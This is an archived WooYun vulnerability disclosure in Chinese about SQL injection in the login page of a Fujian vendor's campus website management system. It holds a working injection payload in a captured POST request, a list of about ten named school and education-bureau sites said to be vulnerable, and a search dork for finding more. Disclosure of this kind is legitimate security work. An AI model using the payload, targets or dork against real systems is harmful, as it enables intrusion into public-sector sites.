乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-24: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-03-24: 厂商已经主动忽略漏洞,细节向公众公开
RT
影响福建很多学校啊。根据前面提交的: WooYun: 某通用型校园网站管理系统存在SQL注射#2 WooYun: 某通用型校园网站管理系统存在SQL注射
厂商名称:福建闽教电脑多媒体有限公司官网:http://www.minjiao.com/产品名称:校园网站管理系统
漏洞文件:web/web_programs_dotnet/adminmanage/Default.aspx抓包:
__VIEWSTATE=%2FwEPDwUJMjAxNzM1MDE0D2QWAgIBD2QWAgIHDw8WAh4PU2hpZWxkQ29kZS1UZXh0BQxwSFdLdzM0dUYrbz1kZGTpd3qW5MECaHRyYAt4xIOnjacU4A%3D%3D&__EVENTVALIDATION=%2FwEWBgLKyJDsAwK%2F%2FNWbBALsu4mABAKa1eCCDwLf%2B6b%2BDgLMj8ehB%2FgQ%2F66lcRYqp4czP23%2FboIirAXn&TextBox_USERNAME=111' and 1=@@version and '1'='1&TextBox_PASSWORD=1111&TextBox_ValidCode=4272&Button_Submit=%B5%C7+%C2%BD
TextBox_USERNAME参数过滤不严导致注入。相关案例:
http://web.ptjy.com/web/web_programs_dotnet/adminmanage/Default.aspx 莆田教育网http://www.zzyxjy.com/Web/Web_Programs_DotNet/adminmanage/Default.aspx 云霄教育网http://school.mwedu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx 马尾教育信息网http://school.gledu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx 鼓楼教育信息网http://school.zzlwjy.com/web/web_programs_dotnet/adminmanage/Default.aspx 龙文教育信息网http://school.fjhajy.net/web/web_programs_dotnet/adminmanage/Default.aspx 华安教育信息网http://schoolweb.ctjy.net/web/web_programs_dotnet/adminmanage/Default.aspx 长泰教育网 http://school.fjjyjy.net/web/web_programs_dotnet/adminmanage/Default.aspx 建阳教育信息网http://www.ptedu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx 平潭教育局www.qledu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx 清流县教育网
关键词:inurl:web_programs_dotnet跟前面都是差不多,登录地方有注入漏洞。
案例一:
案例二:
案例三:
太多的案例就不一一列举了,百度一下很多这样的站点的。
修护哦。
未能联系到厂商或者厂商积极拒绝